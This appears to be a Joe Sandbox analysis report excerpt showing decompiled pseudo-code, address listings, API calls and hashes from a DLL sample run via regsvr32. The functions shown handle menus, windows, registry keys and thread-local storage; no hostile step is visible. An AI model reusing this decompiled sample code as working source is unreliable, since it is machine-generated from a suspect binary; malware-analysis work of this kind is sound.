				 *((intOrPtr*)(_t125 + 0x10)) = _t87;
				_t130 = _t123;
				E1003A240(_t51, _t72, 0, _t127 + 0x50, _t118, _t123);
				 *((intOrPtr*)(_t127 + 0x50)) = 0x50;
				 *((intOrPtr*)(_t127 + 0x54)) = 0x40;
				r8d = 0;
				if(GetMenuItemInfoW(??, ??, ??, ??) == 0) {
					L15:
					_t45 = _t104 - 0x18; // 0x0
					_t119 = _t45;
					asm("lock xadd [edx+0x10], eax");
					if(0xffffffff > 0) {
						goto L17;
					}
					return  *((intOrPtr*)( *((intOrPtr*)( *_t119)) + 8))();
				} else {
					_t16 = _t123 - 0x4f; // 0x1
					_t82 =  *((intOrPtr*)(_t127 + 0x90));
					if(( *((intOrPtr*)(_t104 - 0xc)) - _t82 | _t16 -  *((intOrPtr*)(_t104 - 8))) < 0) {
						E10009920(_t82, _t127 + 0xf8, _t123, _t130);
						_t104 =  *((intOrPtr*)(_t127 + 0xf8));
						_t82 =  *((intOrPtr*)(_t127 + 0x90));
					}
					 *((long long*)(_t127 + 0x88)) = _t104;
					 *((intOrPtr*)(_t127 + 0x90)) = _t82 + 1;
					_t133 = _t127 + 0x50;
					r8d = 0;
					_t84 =  *((intOrPtr*)(_t125 + 8));
					_t111 =  *((intOrPtr*)(_t126 + 8));
					_t89 = GetMenuItemInfoW(??, ??, ??, ??);
					if(_t104 != 0) {
						_t111 = _t104;
						_t60 = E10039820(_t59, _t104);
						__eflags = _t60;
						if(_t60 < 0) {
							goto L14;
						}
						goto L11;
					} else {
						_t60 = 0;
						L11:
						if(_t60 >  *((intOrPtr*)(_t104 - 0xc))) {
							L14:
							E10009538(0x80070057, _t84, _t101, _t104, _t111, _t118, _t123, _t130, _t133, _t135);
							goto L15;
						}
						 *((intOrPtr*)(_t104 - 0x10)) = _t60;
						 *((short*)(_t104 + _t101 * 2)) = 0;
						_t98 = _t89;
						if(_t89 != 0) {
							E1000CBA4(_t71, _t127 + 0x28, _t118, _t130, _t135);
							E1000CF7C(0, _t127 + 0x28, _t126 + 0x10, _t130, _t133, _t135);
							r8d =  *((intOrPtr*)(_t104 - 0x10));
							GetTextExtentPoint32W(??, ??, ??, ??);
							E1000CF7C(0, _t127 + 0x28, _t101, _t130, _t127 + 0x100, _t135);
							r11d =  *((intOrPtr*)(_t127 + 0xa4));
							 *((intOrPtr*)(_t125 + 0xc)) = _t101 + _t135 + 5;
							E1000CC2C(_t98, _t104, _t127 + 0x28, _t101);
						}
						goto L15;
					}
				}
			}
























                                                                              0x1002b650
                                                                              0x1002b650
                                                                              0x1002b650
                                                                              0x1002b650
                                                                              0x1002b65c
                                                                              0x1002b665
                                                                              0x1002b668
                                                                              0x1002b66b
                                                                              0x1002b672
                                                                              0x1002b849
                                                                              0x1002b849
                                                                              0x1002b849
                                                                              0x1002b678
                                                                              0x1002b67d
                                                                              0x1002b680
                                                                              0x1002b686
                                                                              0x1002b68d
                                                                              0x1002b694
                                                                              0x1002b699
                                                                              0x1002b699
                                                                              0x1002b69a
                                                                              0x1002b69d
                                                                              0x1002b6a0
                                                                              0x1002b6a0
                                                                              0x1002b6a4
                                                                              0x1002b6bd
                                                                              0x1002b6ca
                                                                              0x1002b6cd
                                                                              0x1002b6da
                                                                              0x1002b6dc
                                                                              0x1002b6e7
                                                                              0x1002b6e7
                                                                              0x1002b6e9
                                                                              0x1002b6f1
                                                                              0x1002b6fb
                                                                              0x1002b700
                                                                              0x1002b704
                                                                              0x1002b711
                                                                              0x1002b723
                                                                              0x1002b820
                                                                              0x1002b820
                                                                              0x1002b820
                                                                              0x1002b829
                                                                              0x1002b833
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002b729
                                                                              0x1002b729
                                                                              0x1002b732
                                                                              0x1002b73d
                                                                              0x1002b747
                                                                              0x1002b74c
                                                                              0x1002b754
                                                                              0x1002b754
                                                                              0x1002b75b
                                                                              0x1002b766
                                                                              0x1002b76d
                                                                              0x1002b772
                                                                              0x1002b775
                                                                              0x1002b778
                                                                              0x1002b782
                                                                              0x1002b787
                                                                              0x1002b78d
                                                                              0x1002b790
                                                                              0x1002b795
                                                                              0x1002b797
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002b789
                                                                              0x1002b789
                                                                              0x1002b799
                                                                              0x1002b79c
                                                                              0x1002b815
                                                                              0x1002b81a
                                                                              0x00000000
                                                                              0x1002b81a
                                                                              0x1002b79e
                                                                              0x1002b7a3
                                                                              0x1002b7a9
                                                                              0x1002b7ab
                                                                              0x1002b7b4
                                                                              0x1002b7c3
                                                                              0x1002b7d3
                                                                              0x1002b7df
                                                                              0x1002b7ed
                                                                              0x1002b7f2
                                                                              0x1002b806
                                                                              0x1002b80e
                                                                              0x1002b80e
                                                                              0x00000000
                                                                              0x1002b7ab
                                                                              0x1002b787

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenuMetricsSystem$ExtentObjectPoint32Text
                                                                              • String ID: @
                                                                              • API String ID: 2751711798-2766056989
                                                                              • Opcode ID: 082be72c642cfcc285d72effb7309705f2dbf96442a469b306221583a2473bd9
                                                                              • Instruction ID: 4a740a115d0508bd48493c8d6861a8cb1f5b76a5a9c6905b4d7b54f78e281134
                                                                              • Opcode Fuzzy Hash: 082be72c642cfcc285d72effb7309705f2dbf96442a469b306221583a2473bd9
                                                                              • Instruction Fuzzy Hash: 22518037704A8586E724CF25E84479EB3A1FBC8BA4F458225DBAD47B58DF78D885CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10031F88 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreate$Open
                                                                              • String ID: PreviewPages$software
                                                                              • API String ID: 1740278721-4240438196
                                                                              • Opcode ID: 24ee8a221d99efd5ecef4808d03952e256d1655fe083a1f0e69368342a74ae06
                                                                              • Instruction ID: 12546408516b6cc7f83814eb14aae2ef3b2aeae9286f0953fd7d24da3e421422
                                                                              • Opcode Fuzzy Hash: 24ee8a221d99efd5ecef4808d03952e256d1655fe083a1f0e69368342a74ae06
                                                                              • Instruction Fuzzy Hash: 10213E36319B8086EBA18F10F494B9AB3A4F788799F515215DBCD47B58DFB9C188CF00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100180FC Relevance: 12.1, APIs: 8, Instructions: 132windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 31%
                                                                              			E100180FC(signed int __esi, intOrPtr* __rax, void* __rcx, long long __rdx, void* __r8, intOrPtr* __r11) {
				void* __rbx;
				void* __rdi;
				intOrPtr _t35;
				intOrPtr _t41;
				signed int _t59;
				signed int _t75;
				intOrPtr* _t79;
				intOrPtr _t81;
				void* _t83;
				long long _t84;
				intOrPtr _t96;
				intOrPtr* _t105;
				void* _t107;
				intOrPtr* _t108;
				void* _t109;

				_t112 = __r11;
				_t110 = __r8;
				_t102 = __rdx;
				_t79 = __rax;
				 *((long long*)(_t109 + 0x40)) = 0xfffffffe;
				_t59 = r8d;
				_t107 = __rcx;
				 *((intOrPtr*)(__rcx + 0x160)) = 1;
				_t34 =  !=  ? 0x80c83300 : 0x80c83b00;
				 *((intOrPtr*)(_t109 + 0x38)) = 0;
				 *((long long*)(_t109 + 0x30)) = __rdx;
				 *((long long*)(_t109 + 0x28)) = 0x1006ee60;
				 *((intOrPtr*)(_t109 + 0x20)) =  !=  ? 0x80c83300 : 0x80c83b00;
				_t111 = 0x100577b8;
				r8d = 0;
				_t35 = E1002C1E4(_t59, 0x80c83300, 0, __esi, __rax, __rcx, __r8, 0x100577b8, __r11);
				if(_t35 == 0) {
					 *((intOrPtr*)(_t107 + 0x160)) = _t35;
					return _t35;
				}
				asm("sbb esi, esi");
				_t60 = _t59 & 0x00000040;
				_t75 = (__esi & 0xfffff000) + 0x00002000 | _t59 & 0x00000040;
				_t67 = 0;
				GetSystemMenu(??, ??);
				E1002AC28(_t59 & 0x00000040, 0, __rax, __rax, _t102, _t110, 0x100577b8, __r11);
				_t108 = _t79;
				if(_t79 == 0) {
					L11:
					_t80 =  *((intOrPtr*)(_t107 + 0x190));
					r9d = 0xe81f;
					r8d = _t75 | 0x50000000;
					_t41 =  *((intOrPtr*)( *((intOrPtr*)(_t107 + 0x190)) + 0x2d8))();
					if(_t41 != 0) {
						SetParent();
						E10011808(_t60, _t67, _t80, _t80,  *((intOrPtr*)(_t107 + 0x40)), _t110, _t111, _t112);
						 *((intOrPtr*)(_t107 + 0x160)) = 0;
						return 1;
					}
					 *((intOrPtr*)(_t107 + 0x160)) = _t41;
					return _t41;
				} else {
					r8d = 0;
					DeleteMenu(??, ??, ??);
					r8d = 0;
					DeleteMenu(??, ??, ??);
					r8d = 0;
					DeleteMenu(??, ??, ??);
					r8d = 0;
					_t67 = 0xf120;
					_t96 =  *((intOrPtr*)(_t108 + 8));
					E10029130(DeleteMenu(??, ??, ??));
					_t112 = _t79;
					if((0 | _t79 != 0x00000000) == 0) {
						E10009538(0x80004005, 0xf120, _t79, _t83, _t96, _t102, _t107, _t110, 0x100577b8, _t112);
						asm("int3");
					}
					_t81 =  *_t79;
					 *((intOrPtr*)(_t81 + 0x18))();
					_t18 = _t81 + 0x18; // 0x18
					_t84 = _t18;
					 *((long long*)(_t109 + 0x80)) = _t84;
					E10028FE0(_t81);
					if(_t81 != 0) {
						r8d = 0xf011;
						if(E10009BA4(_t81, _t109 + 0x80, _t81, _t110, _t112) == 0) {
							_t84 =  *((intOrPtr*)(_t109 + 0x80));
						} else {
							r8d = 0;
							DeleteMenu(??, ??, ??);
							_t84 =  *((intOrPtr*)(_t109 + 0x80));
							_t111 = _t84;
							_t67 = 0;
							r8d = 0xf060;
							AppendMenuW(??, ??, ??, ??);
						}
					}
					_t25 = _t84 - 0x18; // 0x0
					_t105 = _t25;
					asm("lock xadd [edx+0x10], eax");
					if(0x1fffffffe <= 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t105)) + 8))();
					}
					goto L11;
				}
			}


















                                                                              0x100180fc
                                                                              0x100180fc
                                                                              0x100180fc
                                                                              0x100180fc
                                                                              0x10018107
                                                                              0x10018110
                                                                              0x10018116
                                                                              0x10018119
                                                                              0x10018131
                                                                              0x10018134
                                                                              0x1001813c
                                                                              0x10018148
                                                                              0x1001814d
                                                                              0x10018151
                                                                              0x10018158
                                                                              0x10018160
                                                                              0x10018167
                                                                              0x10018169
                                                                              0x00000000
                                                                              0x10018169
                                                                              0x1001817d
                                                                              0x1001818b
                                                                              0x1001818e
                                                                              0x10018190
                                                                              0x10018196
                                                                              0x1001819f
                                                                              0x100181a4
                                                                              0x100181aa
                                                                              0x100182ac
                                                                              0x100182b3
                                                                              0x100182bc
                                                                              0x100182c2
                                                                              0x100182c8
                                                                              0x100182d0
                                                                              0x100182e5
                                                                              0x100182ee
                                                                              0x100182f3
                                                                              0x00000000
                                                                              0x100182fd
                                                                              0x100182d2
                                                                              0x00000000
                                                                              0x100181b0
                                                                              0x100181b0
                                                                              0x100181bc
                                                                              0x100181c2
                                                                              0x100181ce
                                                                              0x100181d4
                                                                              0x100181e0
                                                                              0x100181e6
                                                                              0x100181e9
                                                                              0x100181ee
                                                                              0x100181f8
                                                                              0x100181fd
                                                                              0x1001820a
                                                                              0x10018211
                                                                              0x10018216
                                                                              0x10018216
                                                                              0x10018217
                                                                              0x1001821d
                                                                              0x10018220
                                                                              0x10018220
                                                                              0x10018224
                                                                              0x10018231
                                                                              0x10018239
                                                                              0x1001823b
                                                                              0x10018253
                                                                              0x10018286
                                                                              0x10018255
                                                                              0x10018255
                                                                              0x10018261
                                                                              0x10018267
                                                                              0x1001826f
                                                                              0x10018272
                                                                              0x10018274
                                                                              0x1001827e
                                                                              0x1001827e
                                                                              0x10018253
                                                                              0x1001828e
                                                                              0x1001828e
                                                                              0x10018297
                                                                              0x100182a1
                                                                              0x100182a9
                                                                              0x100182a9
                                                                              0x00000000
                                                                              0x100182a1

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$AppendCursorLoadSystem
                                                                              • String ID:
                                                                              • API String ID: 2015869418-0
                                                                              • Opcode ID: 9c1d781f4fd0c8ce8b80b5a1e11dd64d5bf7c9a5943a62b8d453398dc12113f6
                                                                              • Instruction ID: 8c58844e12facce95e2a5f2e94d06b43a7b0124d8a29adc72a53903ea7df118e
                                                                              • Opcode Fuzzy Hash: 9c1d781f4fd0c8ce8b80b5a1e11dd64d5bf7c9a5943a62b8d453398dc12113f6
                                                                              • Instruction Fuzzy Hash: 8E51E376310A8182EB15CB25EC547AE33A0FB89BD4F454235EE5D8BBA4DF39C985C740
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10011D00 Relevance: 12.1, APIs: 8, Instructions: 128windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 41%
                                                                              			E10011D00(intOrPtr __edx, void* __esi, void* __rcx, char* __rdx, void* __r8, char* __r9, void* __r11, intOrPtr _a16, intOrPtr _a40, intOrPtr* _a48, intOrPtr* _a56, intOrPtr _a64) {
				intOrPtr _v88;
				struct HWND__* _v92;
				intOrPtr _v96;
				char _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char _v112;
				char _v120;
				struct HWND__* _t41;
				intOrPtr _t48;
				void* _t56;
				intOrPtr* _t65;
				intOrPtr* _t74;
				char* _t79;
				intOrPtr* _t84;
				long long _t85;
				void* _t86;
				void* _t90;
				intOrPtr* _t92;
				char* _t93;
				void* _t94;
				void* _t96;
				void* _t97;
				long long _t98;
				void* _t99;

				_t94 = __r11;
				_t93 = __r9;
				_t90 = __r8;
				_t79 = __rdx;
				_t56 = __esi;
				_t54 = __edx;
				_a16 = __edx;
				_t65 = _a56;
				r12d = _a64;
				r14d = 0;
				r13d = r9d;
				r15d = r8d;
				_t85 = _t98;
				_v88 = r12d;
				_v92 = r14d;
				_v96 = r14d;
				if(_t65 == _t98) {
					_t79 =  &_v112;
					GetClientRect(??, ??);
				} else {
					asm("movdqu xmm0, [eax]");
					asm("movdqu [esp+0x28], xmm0");
				}
				_t48 = _a40;
				asm("btr ebx, 0xf");
				if(_t48 == 1) {
					_v120 = _t98;
				} else {
					BeginDeferWindowPos();
					_v120 = _t65;
				}
				_t41 = GetTopWindow();
				_t84 = _t65;
				if(_t65 == _t98) {
					L16:
					if(_t48 != 1) {
						__eflags = r13d - r14d;
						if(r13d != r14d) {
							__eflags = _t85 - _t98;
							if(_t85 != _t98) {
								_t41 = E10011808(_t48, _t54, _t65, _t85, _t79, _t90, _t93, _t94);
								__eflags = _t48 - 2;
								if(__eflags == 0) {
									_t92 = _a48;
									_v112 = _v112 +  *_t92;
									_v108 = _v108 +  *((intOrPtr*)(_t92 + 4));
									_v104 = _v104 -  *((intOrPtr*)(_t92 + 8));
									_t33 =  &_v100;
									 *_t33 = _v100 -  *((intOrPtr*)(_t92 + 0xc));
									__eflags =  *_t33;
								}
								asm("bt dword [esp+0xc0], 0xf");
								if(__eflags >= 0) {
									r8d = 0;
									__eflags = r8d;
									 *((intOrPtr*)( *_t65 + 0xd0))();
									_t41 = E1000ED54( *_t65,  &_v120, _t85,  &_v112);
								}
							}
						}
						__eflags = _v120 - _t98;
						if(_v120 != _t98) {
							_t41 = EndDeferWindowPos();
						}
					} else {
						_t74 = _a48;
						if(r12d == r14d) {
							 *((intOrPtr*)(_t74 + 4)) = r14d;
							 *_t74 = r14d;
							 *((intOrPtr*)(_t74 + 8)) = _v96;
							_t41 = _v92;
							 *(_t74 + 0xc) = _t41;
						} else {
							_t41 = CopyRect();
						}
					}
					return _t41;
				} else {
					r12d = _a16;
					goto L8;
					L14:
					_t54 = 2;
					_t41 = GetWindow(??, ??);
					_t84 = _t65;
					if(_t65 != 0) {
						L8:
						GetDlgCtrlID();
						E10011844(_t48, 8, _t56, _t65, _t84, _t79, _t94);
						if(_t86 != _t97) {
							__eflags = _t86 - _t96;
							if(_t86 >= _t96) {
								__eflags = _t86 - _t99;
								if(_t86 <= _t99) {
									__eflags = _t65;
									if(_t65 != 0) {
										_t93 =  &_v120;
										r8d = 0;
										__eflags = r8d;
										SendMessageW(??, ??, ??, ??);
									}
								}
							}
						} else {
							_t85 = _t84;
						}
						goto L14;
					} else {
						r12d = _a64;
						goto L16;
					}
				}
			}




























                                                                              0x10011d00
                                                                              0x10011d00
                                                                              0x10011d00
                                                                              0x10011d00
                                                                              0x10011d00
                                                                              0x10011d00
                                                                              0x10011d00
                                                                              0x10011d14
                                                                              0x10011d1c
                                                                              0x10011d24
                                                                              0x10011d2a
                                                                              0x10011d2d
                                                                              0x10011d33
                                                                              0x10011d36
                                                                              0x10011d3b
                                                                              0x10011d40
                                                                              0x10011d45
                                                                              0x10011d57
                                                                              0x10011d5c
                                                                              0x10011d47
                                                                              0x10011d47
                                                                              0x10011d4b
                                                                              0x10011d4b
                                                                              0x10011d62
                                                                              0x10011d69
                                                                              0x10011d70
                                                                              0x10011d84
                                                                              0x10011d72
                                                                              0x10011d77
                                                                              0x10011d7d
                                                                              0x10011d7d
                                                                              0x10011d8d
                                                                              0x10011d96
                                                                              0x10011d99
                                                                              0x10011e04
                                                                              0x10011e07
                                                                              0x10011e40
                                                                              0x10011e43
                                                                              0x10011e45
                                                                              0x10011e48
                                                                              0x10011e4d
                                                                              0x10011e52
                                                                              0x10011e58
                                                                              0x10011e5a
                                                                              0x10011e65
                                                                              0x10011e6d
                                                                              0x10011e75
                                                                              0x10011e7d
                                                                              0x10011e7d
                                                                              0x10011e7d
                                                                              0x10011e7d
                                                                              0x10011e81
                                                                              0x10011e8a
                                                                              0x10011e94
                                                                              0x10011e94
                                                                              0x10011e9a
                                                                              0x10011ead
                                                                              0x10011ead
                                                                              0x10011e8a
                                                                              0x10011e48
                                                                              0x10011eb7
                                                                              0x10011eba
                                                                              0x10011ebc
                                                                              0x10011ebc
                                                                              0x10011e09
                                                                              0x10011e0c
                                                                              0x10011e14
                                                                              0x10011e2a
                                                                              0x10011e2e
                                                                              0x10011e31
                                                                              0x10011e34
                                                                              0x10011e38
                                                                              0x10011e16
                                                                              0x10011e1b
                                                                              0x10011e1b
                                                                              0x10011e14
                                                                              0x10011ed2
                                                                              0x10011d9b
                                                                              0x10011d9b
                                                                              0x10011d9b
                                                                              0x10011de6
                                                                              0x10011de6
                                                                              0x10011dee
                                                                              0x10011df7
                                                                              0x10011dfa
                                                                              0x10011da3
                                                                              0x10011da6
                                                                              0x10011db2
                                                                              0x10011dba
                                                                              0x10011dc1
                                                                              0x10011dc4
                                                                              0x10011dc6
                                                                              0x10011dc9
                                                                              0x10011dcb
                                                                              0x10011dce
                                                                              0x10011dd0
                                                                              0x10011dd5
                                                                              0x10011dd5
                                                                              0x10011de0
                                                                              0x10011de0
                                                                              0x10011dce
                                                                              0x10011dc9
                                                                              0x10011dbc
                                                                              0x10011dbc
                                                                              0x10011dbc
                                                                              0x00000000
                                                                              0x10011dfc
                                                                              0x10011dfc
                                                                              0x00000000
                                                                              0x10011dfc
                                                                              0x10011dfa

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                                                                              • String ID:
                                                                              • API String ID: 1228040700-0
                                                                              • Opcode ID: aeb4829c7e09896d8793b3d4bd7e9d07734a6b56576e1c32885538740eaf9625
                                                                              • Instruction ID: 1fc4b65a660be37cb7519378020db65ac6a4ef3b050db520507941750aa7b347
                                                                              • Opcode Fuzzy Hash: aeb4829c7e09896d8793b3d4bd7e9d07734a6b56576e1c32885538740eaf9625
                                                                              • Instruction Fuzzy Hash: FE414C3260968087DB68CB55E8407ADB7A1F788BD8F058116EE8A1BB24DF78C8C5CF05
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10028AA4 Relevance: 12.1, APIs: 8, Instructions: 108memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 55%
                                                                              			E10028AA4(signed long long __edx, void* __esi, signed long long __rax, long long __rcx, void* __rdx, long long __r8, void* __r9, void* __r11, long long _a8) {
				long long _v56;
				void* __rbx;
				void* __rdi;
				int _t30;
				void* _t51;
				signed long long _t64;
				signed long long _t66;
				long long _t68;
				intOrPtr _t70;
				signed long long _t74;
				void* _t77;
				long long _t79;
				signed long long _t80;
				void* _t87;
				void* _t88;
				signed long long _t89;
				long long _t90;

				_t88 = __r11;
				_t87 = __r9;
				_t84 = __r8;
				_t77 = __rdx;
				_t63 = __rax;
				_t51 = __esi;
				_t47 = __edx;
				_a8 = __rcx;
				_v56 = 0xfffffffe;
				_t90 = __r8;
				_t80 = __edx;
				_t79 = __rcx;
				_t70 = __rcx + 0x28;
				EnterCriticalSection(??);
				if(__esi <= 0) {
					L24:
					LeaveCriticalSection();
				} else {
					_t3 = _t79 + 0xc; // 0x3e450000000003
					if(__esi >=  *_t3) {
						goto L24;
					} else {
						_t30 = TlsGetValue();
						_t68 = __rax;
						if(__rax == 0) {
							E10028664(__rax, _t70);
							_t68 = __rax;
							if(__rax != 0) {
								 *__rax = 0x1005b3e0;
							}
							 *(_t68 + 0x10) = 0;
							 *(_t68 + 0x18) = 0;
							_t7 = _t79 + 0x20; // 0x8
							_t70 =  *_t7;
							_t8 = _t79 + 0x18; // 0x3e3d60
							_t63 =  *_t8;
							 *(_t68 + _t70) = _t63;
							 *((long long*)(_t79 + 0x18)) = _t68;
							goto L10;
						} else {
							if(__esi >=  *((intOrPtr*)(__rax + 0x10)) && __r8 != 0) {
								L10:
								if( *(_t68 + 0x18) != 0) {
									_t64 = _t63 << 3;
									_t43 = 0xffffffff;
									if(_t64 > _t70) {
										_t43 = 0x80070057;
										E10009538(0x80070057, _t47, _t64, _t68, _t70, _t77, _t79, _t84, _t87, _t88);
										asm("int3");
									}
									r8d = 2;
									LocalReAlloc(??, ??, ??);
									_t89 = _t64;
								} else {
									_t66 = _t63 << 3;
									if(_t66 > _t70) {
										E10009538(0x80070057, _t47, _t66, _t68, _t70, _t77, _t79, _t84, _t87, _t88);
										asm("int3");
									}
									_t43 = 0;
									LocalAlloc(??, ??);
									_t89 = _t66;
								}
								if(_t89 == 0) {
									LeaveCriticalSection();
									E100164FC();
									asm("int3");
								}
								 *(_t68 + 0x18) = _t89;
								_t17 = _t79 + 0xc; // 0x3e450000000003
								E1003A240( *_t17 -  *(_t68 + 0x10), _t43, 0, _t89 +  *(_t68 + 0x10) * 8, _t77,  *_t17 -  *(_t68 + 0x10) << 3);
								_t22 = _t79 + 0xc; // 0x3e450000000003
								r11d =  *_t22;
								 *(_t68 + 0x10) = r11d;
								_t30 = TlsSetValue(??, ??);
							}
						}
						_t74 =  *(_t68 + 0x18);
						if(_t74 != 0 && _t51 <  *(_t68 + 0x10)) {
							 *((long long*)(_t74 + _t80 * 8)) = _t90;
						}
						LeaveCriticalSection();
					}
				}
				return _t30;
			}




















                                                                              0x10028aa4
                                                                              0x10028aa4
                                                                              0x10028aa4
                                                                              0x10028aa4
                                                                              0x10028aa4
                                                                              0x10028aa4
                                                                              0x10028aa4
                                                                              0x10028aa4
                                                                              0x10028ab4
                                                                              0x10028abd
                                                                              0x10028ac0
                                                                              0x10028ac3
                                                                              0x10028ac6
                                                                              0x10028aca
                                                                              0x10028ad2
                                                                              0x10028c0d
                                                                              0x10028c11
                                                                              0x10028ad8
                                                                              0x10028ad8
                                                                              0x10028adb
                                                                              0x00000000
                                                                              0x10028ae1
                                                                              0x10028ae3
                                                                              0x10028ae9
                                                                              0x10028aef
                                                                              0x10028b0a
                                                                              0x10028b0f
                                                                              0x10028b15
                                                                              0x10028b1e
                                                                              0x10028b1e
                                                                              0x10028b25
                                                                              0x10028b2c
                                                                              0x10028b34
                                                                              0x10028b34
                                                                              0x10028b38
                                                                              0x10028b38
                                                                              0x10028b3c
                                                                              0x10028b40
                                                                              0x00000000
                                                                              0x10028af1
                                                                              0x10028af4
                                                                              0x10028b44
                                                                              0x10028b49
                                                                              0x10028b79
                                                                              0x10028b7d
                                                                              0x10028b85
                                                                              0x10028b87
                                                                              0x10028b8c
                                                                              0x10028b91
                                                                              0x10028b91
                                                                              0x10028b94
                                                                              0x10028b9e
                                                                              0x10028ba4
                                                                              0x10028b4b
                                                                              0x10028b4e
                                                                              0x10028b5a
                                                                              0x10028b61
                                                                              0x10028b66
                                                                              0x10028b66
                                                                              0x10028b69
                                                                              0x10028b6b
                                                                              0x10028b71
                                                                              0x10028b71
                                                                              0x10028baa
                                                                              0x10028bb0
                                                                              0x10028bb6
                                                                              0x10028bbb
                                                                              0x10028bbb
                                                                              0x10028bbc
                                                                              0x10028bc0
                                                                              0x10028bd7
                                                                              0x10028bdc
                                                                              0x10028bdc
                                                                              0x10028be0
                                                                              0x10028be9
                                                                              0x10028be9
                                                                              0x10028af4
                                                                              0x10028bef
                                                                              0x10028bf6
                                                                              0x10028bfd
                                                                              0x10028bfd
                                                                              0x10028c05
                                                                              0x10028c05
                                                                              0x10028adb
                                                                              0x10028c22

                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,10028D61), ref: 10028ACA
                                                                              • TlsGetValue.KERNEL32 ref: 10028AE3
                                                                              • LocalAlloc.KERNEL32(?,?,?,?,?,10028D61), ref: 10028B6B
                                                                              • LocalReAlloc.KERNEL32(?,?,?,?,?,10028D61), ref: 10028B9E
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,10028D61), ref: 10028BB0
                                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,10028D61), ref: 10028BE9
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,10028D61), ref: 10028C05
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,10028D61), ref: 10028C11
                                                                              Memory Dump Source
